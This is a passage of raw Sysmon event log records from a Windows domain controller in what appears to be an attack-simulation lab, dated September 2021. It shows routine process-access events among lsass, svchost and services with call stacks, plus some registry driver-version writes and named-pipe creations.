09:20:00.623{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.623{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.623{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.607{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.576{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.576{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.576{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.576{5EBD8912-8CBD-6151-0A00-00000000FD01}624420C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.576{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBD-6151-0A00-00000000FD01}624100C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.545{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.545{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001052709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.545{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001052708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.545{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001052707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001052705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001052704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001052703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x80000000000000001052701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001052700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001052699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.514{5EBD8912-8CC0-6151-1100-00000000FD01}412\Winsock2\CatalogChangeListener-19c-0C:\Windows\System32\svchost.exe 17141700x80000000000000001052693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.498{5EBD8912-8CC0-6151-1100-00000000FD01}412\eventlogC:\Windows\System32\svchost.exe 10341000x80000000000000001052692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.482{5EBD8912-8CBD-6151-0A00-00000000FD01}624700C:\Windows\system32\services.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32